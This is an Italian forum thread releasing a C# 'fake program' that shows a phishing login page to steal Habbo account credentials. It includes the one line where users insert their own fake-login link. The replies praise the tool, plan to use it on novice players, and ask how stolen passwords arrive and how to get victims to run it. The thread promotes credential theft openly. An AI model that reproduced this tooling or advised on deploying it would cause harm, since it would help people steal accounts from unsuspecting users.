Release [Fake Program]Habbo Script 2009

EeeWindows7

Utente Assiduo
Autore del topic
7 Novembre 2009
833
19
Miglior risposta
0
Ciao a tutti,
oggi vi presento il mio primo fake program :emoji_slight_smile:
Premetto che non è un granchè però può farci cascare un pò di noob ::emoji_relieved:no:
CODATO IN C#
Screen:
habboscript2009.png
Questo fake utilizza un fake login per rubare i dati
Per utilizzarlo voi,prendete le source e cambiate la seguente stringa:
webBrowser1.Navigate("Immette qui il link del vostro fake")
Mette il link del vostro fake login :emoji_slight_smile:
Download Source:
Perfavore, Entra oppure Registrati per vedere i Link!


:bye:
EeeWindows7
 
Davvero molto carino lo userò,però prima ti volevo chiedere dove arrivano le password (non sono un esperto di fake program)
 
carino bravo per essere il tuo primo fake... cmq si qualche noob ci casca sempre (ricordo ancora il noob con 300 crdt che è cascato al trucco di scrivere la password e premere ctrl+m)
 
Non ho capito una cosa.. bisogna scrivere solo il link del fake? Esempio:
Perfavore, Entra oppure Registrati per vedere i Link!
e le password arrivano? Oppure bisogna creare qualche file nel sito? :emoji_confused:... Comunque bravo
 
Bravo provo subito. Comunque no Z_Y_X se non erro scrivi solo il sito del tuo fake e il file del log si dovrebbe creare automaticamente quando la vittima effettua il login
 
Ultima modifica:
dagli screen mi sembra un bel fake,ma le password arrivano nel mio fake,ma in che senzo devo inserire la mia e-mail li,il mio fake sarebbe la mia e-mail?
--------------- AGGIUNTA AL POST ---------------
senti io ho aperto la cartella,ma i file sono in formato che ancora si devono estrarre come se non ci fosse il formato,non so se hai capito,non so come aprire il programma,con quale programma lo devo aprire?
--------------- AGGIUNTA AL POST ---------------
con quale programma si apre il programma.perchè se lo invio alla vittima ma non sa aprirlo io come faccio?
 
Ultima modifica: